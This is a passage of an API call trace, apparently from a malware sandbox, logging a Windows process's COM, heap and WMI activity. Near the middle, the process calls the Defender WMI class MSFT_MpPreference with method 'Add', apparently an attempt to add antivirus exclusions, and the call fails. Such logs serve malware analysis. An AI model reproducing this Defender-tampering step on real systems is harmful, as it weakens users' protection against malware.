(HeapHandle=0x510000, Flags=0x0, Size=0xc8) returned 0x1a7c86d0 [0346.985] GetProcessHeap () returned 0x510000 [0346.985] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x1a8a8cb0 [0346.985] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fffcbe91a68, pUnk=0x1a7c86d0, riid=0x7fffbdc4a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x1a56fa70 | out: pdwCookie=0x1a56fa70*=0x201) returned 0x0 [0346.985] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1a7c86d0) returned 0x2 [0346.985] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1dc40*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1a56f028 | out: ppvObject=0x1a56f028*=0x0) returned 0x80004002 [0346.985] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1a7c86d0) returned 0x3 [0346.985] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1dc50*(Data1=0x39, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a56ef40 | out: ppvObject=0x1a56ef40*=0x0) returned 0x80004002 [0346.985] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1dbe0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a56ef20 | out: ppvObject=0x1a56ef20*=0x0) returned 0x80004002 [0346.986] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1de38*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1a56ef28 | out: ppvObject=0x1a56ef28*=0x0) returned 0x80004002 [0346.986] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1dce8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a56ef38 | out: ppvObject=0x1a56ef38*=0x0) returned 0x80004002 [0346.986] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x2 [0346.986] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1a7c86d0) returned 0x3 [0346.986] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x2 [0346.986] StdGlobalInterfaceTable:IGlobalInterfaceTable:GetInterfaceFromGlobal (in: This=0x7fffcbe91a68, dwCookie=0x201, riid=0x7fffbdc55478*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppv=0x1a56fa10 | out: ppv=0x1a56fa10*=0x1a7c8f78) returned 0x0 [0346.986] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1dbe0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a56f148 | out: ppvObject=0x1a56f148*=0x0) returned 0x80004002 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1dcd8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a56f040 | out: ppvObject=0x1a56f040*=0x1a7c86d0) returned 0x0 [0346.987] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1a7c86d0) returned 0x4 [0346.987] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1a7c86d0) returned 0x5 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1a888*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a56e9c8 | out: ppvObject=0x1a56e9c8*=0x0) returned 0x80004002 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a56e9d8 | out: ppvObject=0x1a56e9d8*=0x0) returned 0x80004002 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1a8a8*(Data1=0x40, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a56e990 | out: ppvObject=0x1a56e990*=0x0) returned 0x80004002 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a56e9e0 | out: ppvObject=0x1a56e9e0*=0x0) returned 0x80004002 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1de38*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1a56e9c0 | out: ppvObject=0x1a56e9c0*=0x0) returned 0x80004002 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a56e9e8 | out: ppvObject=0x1a56e9e8*=0x0) returned 0x80004002 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1a848*(Data1=0x77dd1250, Data2=0x139c, Data3=0x2bc3, Data4=([0]=0xbd, [1]=0x95, [2]=0x90, [3]=0xa, [4]=0xce, [5]=0xd6, [6]=0x1b, [7]=0xe5)), ppvObject=0x1a56e9b8 | out: ppvObject=0x1a56e9b8*=0x0) returned 0x80004002 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a56e9f0 | out: ppvObject=0x1a56e9f0*=0x0) returned 0x80004002 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1a838*(Data1=0xbfd60505, Data2=0x5a1f, Data3=0x4e41, Data4=([0]=0x88, [1]=0xba, [2]=0xa6, [3]=0xfb, [4]=0x7, [5]=0x20, [6]=0x2d, [7]=0xa9)), ppvObject=0x1a56e9b0 | out: ppvObject=0x1a56e9b0*=0x0) returned 0x80004002 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a56e9f8 | out: ppvObject=0x1a56e9f8*=0x0) returned 0x80004002 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x1a56ea60*(Data1=0x143715d9, Data2=0xa015, Data3=0x40ea, Data4=([0]=0xb6, [1]=0x95, [2]=0xd5, [3]=0xcc, [4]=0x26, [5]=0x7e, [6]=0x36, [7]=0xee)), ppvObject=0x1a56e988 | out: ppvObject=0x1a56e988*=0x0) returned 0x80004002 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x1a56ea60*(Data1=0xd6defab3, Data2=0xdbb9, Data3=0x4413, Data4=([0]=0x8a, [1]=0xf9, [2]=0x55, [3]=0x45, [4]=0x86, [5]=0xfd, [6]=0xff, [7]=0x94)), ppvObject=0x1a56e988 | out: ppvObject=0x1a56e988*=0x0) returned 0x80004002 [0346.987] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x1a56ea60*(Data1=0xea5d0de4, Data2=0x770d, Data3=0x4da0, Data4=([0]=0xa9, [1]=0xf8, [2]=0xd7, [3]=0xf9, [4]=0xa1, [5]=0x40, [6]=0xff, [7]=0x79)), ppvObject=0x1a56e988 | out: ppvObject=0x1a56e988*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x1a56ea60*(Data1=0x816e5b3e, Data2=0x5523, Data3=0x4efc, Data4=([0]=0x92, [1]=0x23, [2]=0x98, [3]=0xec, [4]=0x42, [5]=0x14, [6]=0xc3, [7]=0xa0)), ppvObject=0x1a56e988 | out: ppvObject=0x1a56e988*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x1a56ea60*(Data1=0x3c169ff7, Data2=0x37b2, Data3=0x484c, Data4=([0]=0xb1, [1]=0x99, [2]=0xc3, [3]=0x15, [4]=0x55, [5]=0x90, [6]=0xf3, [7]=0x16)), ppvObject=0x1a56e988 | out: ppvObject=0x1a56e988*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x1a56ea60*(Data1=0x4f4f92b5, Data2=0x6ded, Data3=0x4e9b, Data4=([0]=0xa9, [1]=0x3f, [2]=0x1, [3]=0x38, [4]=0x91, [5]=0xb3, [6]=0xa8, [7]=0xb7)), ppvObject=0x1a56e988 | out: ppvObject=0x1a56e988*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x1a56ea60*(Data1=0x9bc79c93, Data2=0x2289, Data3=0x4bb5, Data4=([0]=0xab, [1]=0xf4, [2]=0x32, [3]=0x87, [4]=0xfd, [5]=0x9c, [6]=0xae, [7]=0x39)), ppvObject=0x1a56e988 | out: ppvObject=0x1a56e988*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x1a56ea60*(Data1=0x1868091e, Data2=0xab5a, Data3=0x415f, Data4=([0]=0xa0, [1]=0x2f, [2]=0x5c, [3]=0x4d, [4]=0xd0, [5]=0xcf, [6]=0x90, [7]=0x1d)), ppvObject=0x1a56e988 | out: ppvObject=0x1a56e988*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x1a56ea60*(Data1=0x11456f96, Data2=0x9d1, Data3=0x4909, Data4=([0]=0x8f, [1]=0x36, [2]=0x4e, [3]=0xb7, [4]=0x4e, [5]=0x42, [6]=0xb9, [7]=0x3e)), ppvObject=0x1a56e988 | out: ppvObject=0x1a56e988*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x1a56ea60*(Data1=0x1ac7516e, Data2=0xe6bb, Data3=0x4a69, Data4=([0]=0xb6, [1]=0x3f, [2]=0xe8, [3]=0x41, [4]=0x90, [5]=0x4d, [6]=0xc5, [7]=0xa6)), ppvObject=0x1a56e988 | out: ppvObject=0x1a56e988*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x1a56ea60*(Data1=0x35bd3360, Data2=0x1b35, Data3=0x4927, Data4=([0]=0xba, [1]=0xe4, [2]=0xb1, [3]=0xe, [4]=0x70, [5]=0xd9, [6]=0x9e, [7]=0xff)), ppvObject=0x1a56e988 | out: ppvObject=0x1a56e988*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x1a56ea60*(Data1=0xf2153260, Data2=0x232e, Data3=0x4474, Data4=([0]=0x9d, [1]=0xa, [2]=0x9f, [3]=0x2a, [4]=0xb1, [5]=0x53, [6]=0x44, [7]=0x1d)), ppvObject=0x1a56e988 | out: ppvObject=0x1a56e988*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a56ea08 | out: ppvObject=0x1a56ea08*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1a878*(Data1=0x3fb5c57, Data2=0xd534, Data3=0x45f5, Data4=([0]=0xa1, [1]=0xf4, [2]=0xd3, [3]=0x95, [4]=0x56, [5]=0x98, [6]=0x38, [7]=0x75)), ppvObject=0x1a56e9a8 | out: ppvObject=0x1a56e9a8*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a56ea10 | out: ppvObject=0x1a56ea10*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1a868*(Data1=0x2c258ae7, Data2=0x50dc, Data3=0x49ff, Data4=([0]=0x9d, [1]=0x1d, [2]=0x2e, [3]=0xcb, [4]=0x9a, [5]=0x52, [6]=0xcd, [7]=0xd7)), ppvObject=0x1a56e9a0 | out: ppvObject=0x1a56e9a0*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1a898*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a877148 | out: ppvObject=0x1a877148*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffcbe1a858*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x1a56e998 | out: ppvObject=0x1a56e998*=0x0) returned 0x80004002 [0346.988] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x4 [0346.988] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1a7c86d0) returned 0x5 [0346.988] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x1b6337c8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a56f150 | out: ppvObject=0x1a56f150*=0x1a7c86d0) returned 0x0 [0346.988] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x5 [0346.989] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffbdc55478*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1a56f1f0 | out: ppvObject=0x1a56f1f0*=0x1a7c86d0) returned 0x0 [0346.995] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffb48d5400*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1b636da8 | out: ppvObject=0x1b636da8*=0x1a7c86d0) returned 0x0 [0346.995] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffb48d5400*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1b67cab0 | out: ppvObject=0x1b67cab0*=0x1a7c86d0) returned 0x0 [0346.995] PublishDebugMessage () returned 0x1 [0346.996] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1a7c8f78) returned 0x2 [0346.996] CreateConversionContext () returned 0x0 [0346.996] GetProcessHeap () returned 0x510000 [0346.996] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x1a8a8ff0 [0346.996] GetMethodParameters () returned 0x0 [0346.996] GetCurrentThreadId () returned 0xdf8 [0346.996] PublishDebugMessage () returned 0x1 [0346.996] WbemLocator:IUnknown:AddRef (This=0x1a8a8af0) returned 0x2 [0346.996] GetProcessHeap () returned 0x510000 [0346.996] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x1a8a0220 [0346.996] _wcsicmp (_String1="root/Microsoft/Windows/Defender", _String2="root/Microsoft/Windows/Defender") returned 0 [0346.996] _wcsicmp (_String1="root/Microsoft/Windows/Defender", _String2="root/Microsoft/Windows/Defender") returned 0 [0346.996] WbemLocator:IUnknown:AddRef (This=0x1b66e0c0) returned 0x3 [0346.997] GetProcessHeap () returned 0x510000 [0346.997] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a0220) returned 1 [0346.997] PublishDebugMessage () returned 0x1 [0346.997] WbemLocator:IUnknown:Release (This=0x1a8a8af0) returned 0x1 [0347.014] GetProcessHeap () returned 0x510000 [0347.014] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a8ff0) returned 1 [0347.014] ParametersToWMIObject () returned 0x0 [0347.016] SetModifiedPropertyNamesToContext () returned 0x0 [0347.016] GetCurrentProcessId () returned 0x1188 [0347.016] PublishClientOperationInfo () returned 0x0 [0347.016] PublishDebugMessage () returned 0x1 [0347.016] GetProcessHeap () returned 0x510000 [0347.017] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x1a8a8c10 [0347.017] IWbemServices:ExecMethodAsync (This=0x1b66e0c0, strObjectPath="MSFT_MpPreference", strMethodName="Add", lFlags=0, pCtx=0x1a832a80, pInParams=0x1b645140, pResponseHandler=0x1a7c8f78) returned 0x0 [0347.017] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffb48d5998*(Data1=0x4963311, Data2=0xc399, Data3=0x408e, Data4=([0]=0xad, [1]=0x51, [2]=0x5, [3]=0xd0, [4]=0x15, [5]=0x6, [6]=0xee, [7]=0xd0)), ppvObject=0x1a56f090 | out: ppvObject=0x1a56f090*=0x0) returned 0x80004002 [0347.018] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x5ea990*(Data1=0x7c857801, Data2=0x7381, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1a56db90 | out: ppvObject=0x1a56db90*=0x1a7c86d0) returned 0x0 [0347.021] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffb48d5400*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1b6378e8 | out: ppvObject=0x1b6378e8*=0x1a7c86d0) returned 0x0 [0347.021] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffb48d5400*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1b67cff0 | out: ppvObject=0x1b67cff0*=0x1a7c86d0) returned 0x0 [0347.033] GetProcessHeap () returned 0x510000 [0347.033] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a8c10) returned 1 [0347.033] PublishDebugMessage () returned 0x1 [0347.033] IUnknown:Release (This=0x1b645140) returned 0x0 [0347.033] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c8f78) returned 0x1 [0347.033] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c8f78) returned 0x0 [0347.033] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0xa [0347.033] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x9 [0347.033] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x8 [0347.033] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x7 [0347.033] CoUninitialize () [0347.034] GetCurrentThreadId () returned 0xdf8 [0347.035] GetProcessHeap () returned 0x510000 [0347.035] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8aaad0) returned 1 [0347.035] SetThreadToken (Thread=0x0, Token=0x0) returned 1 [0347.035] PublishDebugMessage () returned 0x1 [0347.141] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x5eaa08*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1a56d630 | out: ppvObject=0x1a56d630*=0x1a7c86d0) returned 0x0 [0347.142] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffb48d5400*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1b637348 | out: ppvObject=0x1b637348*=0x1a7c86d0) returned 0x0 [0347.142] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a7c86d0, riid=0x7fffb48d5400*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1b67d430 | out: ppvObject=0x1b67d430*=0x1a7c86d0) returned 0x0 [0347.536] StdGlobalInterfaceTable:IWbemObjectSink:SetStatus (This=0x1a7c86d0, lFlags=0, hResult=0xffffffff80041001, strParam=0x0, pObjParam=0x1a86d1c0) returned 0x0 [0347.536] PublishDebugMessage () returned 0x1 [0347.536] GetCurrentThreadId () returned 0xdf8 [0347.536] GetProcessHeap () returned 0x510000 [0347.536] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x1a7dcba0 [0347.536] WMIExtendedObjectToInstance () returned 0x0 [0347.536] _wcsicmp (_String1="MSFT_WmiError", _String2="CIM_Error") returned 10 [0347.536] _wcsicmp (_String1="MSFT_WmiError", _String2="__Parameters") returned 14 [0347.536] _wcsicmp (_String1="MSFT_WmiError", _String2="__ExtendedStatus") returned 14 [0347.536] ?GetMiClass@DynamicSchema@@UEAAJPEBG00PEAPEBU_MI_Class@@@Z () returned 0x80041002 [0347.536] ClassCache_GetClass () returned 0x0 [0347.536] ResultToHRESULT () returned 0x0 [0347.536] Instance_New () returned 0x0 [0347.536] ResultToHRESULT () returned 0x0 [0347.536] ResultToHRESULT () returned 0x0 [0347.537] PublishDebugMessage () returned 0x1 [0347.537] ResultFromHRESULT () returned 0x1 [0347.537] PublishDebugMessage () returned 0x1 [0347.547] GetCurrentThread () returned 0xfffffffffffffffe [0347.547] MI_Helpers_GetCurrentSecurityToken () returned 0x0 [0347.547] SetThreadToken (Thread=0x1a56d588*=0xfffffffffffffffe, Token=0x0) returned 1 [0347.555] PublishDebugMessage () returned 0x1 [0347.555] CreateThreadpoolWork (in: pfnwk=0x7fffbdc42060, pv=0x1a7c4f30, pcbe=0x0 | out: pv=0x1a7c4f30) returned 0x1a848a60 [0347.555] TpPostWork () returned 0x3 [0347.556] MI_OperationWrapper_ScheduleDrainingWorkIfNeeded () returned 0x7fffbc8d1a20 [0347.557] MI_OperationWrapper_DecrementCount_AndDontWorryAboutLifetimeOfMiDotNetDll () returned 0x2 [0347.557] SetThreadToken (Thread=0x1a56d588*=0xfffffffffffffffe, Token=0x894) returned 1 [0347.565] CloseHandle (hObject=0x894) returned 1 [0347.571] malloc (_Size=0x120) returned 0x6f89e0 [0347.571] MI_OperationWrapper_Initialize () returned 0x0 [0347.571] MI_OperationWrapper_SetupDrainingIfNeeded () returned 0x0 [0347.571] PublishDebugMessage () returned 0x1 [0347.571] PublishDebugMessage () returned 0x1 [0347.571] GetProcessHeap () returned 0x510000 [0347.571] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1d8) returned 0x1a7c5110 [0347.571] ??0DynamicSchema@@QEAA@XZ () returned 0x1a7c52d8 [0347.571] GetCorrelationId () returned 0x0 [0347.571] CreateThreadpoolWork (in: pfnwk=0x7fffbdc39d10, pv=0x1a7c5110, pcbe=0x0 | out: pv=0x1a7c5110) returned 0x1a847460 [0347.571] GetProcessHeap () returned 0x510000 [0347.571] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x16) returned 0x1a8a8d90 [0347.571] memcpy (in: _Dst=0x1a8a8d90, _Src=0x7fffbdc506e0, _Size=0x16 | out: _Dst=0x1a8a8d90) returned 0x1a8a8d90 [0347.571] GetTickCount64 () returned 0x124b2e8 [0347.572] GetProcessHeap () returned 0x510000 [0347.572] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x1a8a91b0 [0347.572] PublishDebugMessage () returned 0x1 [0347.572] TpPostWork () returned 0x3 [0347.572] PublishDebugMessage () returned 0x1 [0347.572] MI_OperationWrapper_GetInstance () returned 0x0 [0347.669] GetCurrentThread () returned 0xfffffffffffffffe [0347.669] MI_Helpers_GetCurrentSecurityToken () returned 0x0 [0347.669] SetThreadToken (Thread=0x1a56cfa8*=0xfffffffffffffffe, Token=0x894) returned 1 [0347.669] MI_OperationWrapper_ScheduleDrainingWorkIfNeeded () returned 0x3 [0347.670] MI_OperationWrapper_DecrementCount_AndDontWorryAboutLifetimeOfMiDotNetDll () returned 0x2 [0347.670] SetThreadToken (Thread=0x1a56cfa8*=0xfffffffffffffffe, Token=0x898) returned 1 [0347.670] CloseHandle (hObject=0x898) returned 1 [0347.673] GetComputerNameW (in: lpBuffer=0x1a56d1d0, nSize=0x1a56d4f8 | out: lpBuffer="PXTHFFRYO7", nSize=0x1a56d4f8) returned 1 [0347.673] EtwEventWriteTransfer () returned 0x0 [0347.678] EtwEventWriteTransfer () returned 0x0 [0347.679] SetEvent (hEvent=0x7cc) returned 1 [0347.679] SetEvent (hEvent=0x7dc) returned 1 [0347.680] RtlInterlockedWakeAll () returned 0x0 [0347.680] PublishDebugMessage () returned 0x1 [0347.680] PublishDebugMessage () returned 0x1 [0347.680] GetCurrentThreadId () returned 0xdf8 [0347.680] GetProcessHeap () returned 0x510000 [0347.681] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a7dcba0) returned 1 [0347.681] 